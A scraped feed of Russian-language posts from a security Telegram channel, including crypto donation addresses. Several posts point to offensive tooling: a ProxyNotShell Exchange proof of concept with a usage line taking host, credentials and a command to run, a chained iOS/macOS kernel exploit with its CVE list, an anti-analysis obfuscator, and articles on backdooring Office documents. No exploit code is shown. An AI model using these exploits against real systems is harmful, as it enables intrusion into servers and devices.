Всем привет !!!Вчера у нас был день рождения, каналу исполнился один год.Год был не простой, многое изменилось, приходили и уходили люди, менялась концепция канала, выстраивалась модель поведения.***Много интересных людей постучалось в ЛС с интересными предложениями, (спасибо Вам большое), некоторые из них мы начнем реализовывать уже сегодня.***Начнем с общего ЧАТа для общения и обмена опытом ЧЯТ***Если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8kС днем рождения proxy-bar !!!Иногда тут куется контент)))
2022-11-18 05:39:59
будь в курсеinvite to defcon.social
2022-11-18 05:31:06
ArtfuscatorЛучший подход к психологической войне против reverse-инженеров.Звучит конечно жирно,))downLoad
2022-11-18 05:16:20
Рабочий PoC для CVE-2022-41040 and CVE-2022-41082 (A.K.A ProxyNotShell)*python poc_aug3.py <host> <username> <password> <command>*download POC
2022-11-11 20:17:38
kernel r/w exploit for iOS 15 and macOS 12 *Эксплойт объединяет 4 уязвимости:CVE-2022-32845 : aned signature check bypass for model.hwx.CVE-2022-32948 : DeCxt::FileIndexToWeight() OOB Read due to lack of array index validation.CVE-2022-42805 : ZinComputeProgramUpdateMutables() potential arbitrary read due to Integer overflow issue.CVE-2022-32899 : DeCxt::RasterizeScaleBiasData() Buffer underflow due to integer overflow issue.Протестировано на:iPhone12 Pro (iPhone13,3) with iOS 15.5.iPad Pro (iPad8,10) with iPadOS 15.5.iPhone11 Pro (iPhone12,3) with iOS 15.4.1.MacBookAir10,1 M1 with macOS 12.4.
2022-11-11 15:45:40
Кто твой источник ?Сбор информации из dark-web и темных уголков clearNet в контексте разведки киберугроз.deepdarkCTI Откуда:* Telegram channels, groups and chats* Discord channels* ransomware gangs sites* forums related to cyber criminal activities and data leaks* markets* exploits databases* Twitter accounts* RaaS (Ransomware As A Service) sitesНекоторые могут найти себя 😎#osint #Cyber_Threat_Intelligence
2022-11-11 11:47:54
значит, случаи были
2022-11-10 20:55:27
Вот так оно все и начинается - отличный тред - "У меня есть друг, друг пишет руткиты, а недавно я купил новый ноут, ноут стал странно себя вести и друг хохочет"Теперь комьюнити разворачивает детективную серию по поиску черной кошки в темной комнате.А был ли мальчик ? и был ли rootkitПочитать на ночь removing-a-rootkit (комменты обязательно)#idiots #exFriend
2022-11-10 18:27:28
Backdooring Office Structures. Part 1: The Oldschool Backdooring Office Structures. Part 2: Payload Crumbs In Custom Parts #old